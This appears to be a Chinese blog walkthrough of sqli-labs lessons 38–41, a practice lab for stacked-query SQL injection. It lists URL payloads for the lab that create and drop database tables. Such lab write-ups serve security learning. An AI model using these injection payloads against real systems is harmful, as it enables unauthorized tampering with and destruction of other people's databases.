zoukankan      html  css  js  c++  java
  • sqli-labs Less38-Less41

    补充知识:堆叠注入

     

    Lesson 38  GET - Stacked Query injection - string

    (1)先测试

      ?id=1

      SELECT * FROM users WHERE id='1' LIMIT 0,1

       显示正常,id值被单引号包裹

      加上单引号和注释符

      ?id=1' --+

    (2)构造语句

      ?id=1'; create table crow2 like users; --+

       执行成功

    (3)mysql命令行中查看

       插入成功

    (4)删除刚创建的表

      ?id=1'; drop table crow2; --+

       执行成功

       已成功删除

      Lesson 38结束

    Lesson 39  GET - Stacked Query injection - Intiger based

    (1)先测试

      ?id=1

      SELECT * FROM users WHERE id=1 LIMIT 0,1

       显示正常,id值没有被包裹

    (2)直接构造语句

      ?id=1; create table crow like users;--+

       执行成功

    (3)删除刚创建好的表

      ?id=1; drop table crow;--+

       执行成功

       成功删除

      Lesson 39结束

    Lesson 40  GET - Blind based - string - stacked

    (1)先测试

      ?id=1 

      SELECT * FROM users WHERE id=('1') LIMIT 0,1

       显示正常,id值被单引号和括号包裹

      加上单引号和单括号 注释符

      ?id=1') --+

    (2)构造语句

      ?id=1'); create table crow lie users; --+

     

       创建成功

    (3)删除表

      ?id=1'); drop table crow; --+

       执行成功

       删除成功

      Lesson 40结束

    Lesson 41  GET - Blind based - Intiger - Stacked

    (1)先测试

      ?id=1

      SELECT * FROM users WHERE id=1 LIMIT 0,1

       显示正常,id值没有进行包裹

    (2)加上单引号

      ?id=1'

       没有任何回显

      前几关,加上相应的会进行报错,所以证明这次的是盲注,只有输入正确的时候才会显示。不过不怎么影响接下来的操作。

    (3)构造语句

      ?id=1; create table crow like users;--+

     

       创建成功

    (4)删除表

      ?id=1; drop table crow;--+

     

       删除成功

      Lesson 41结束

  • 相关阅读:
    练习系列 5、求子数组的最大和
    练习系列 8、m进制转n进制(任意进制转换)
    bind1st/bind2nd与mem_fun组合使用的问题
    练习系列 4、异质链表
    幻方常规解法汇总
    练习系列 7、打印数据的二进制表示
    C++成员函数指针错误用法警示
    FreeBSD启动出现My unqualified host name unkown...Sleeping for retry...解决方案
    从DLL导出.a文件
    WIN7桌面无反应解决方案
  • 原文地址:https://www.cnblogs.com/zhaihuijie/p/12600489.html
Copyright © 2011-2022 走看看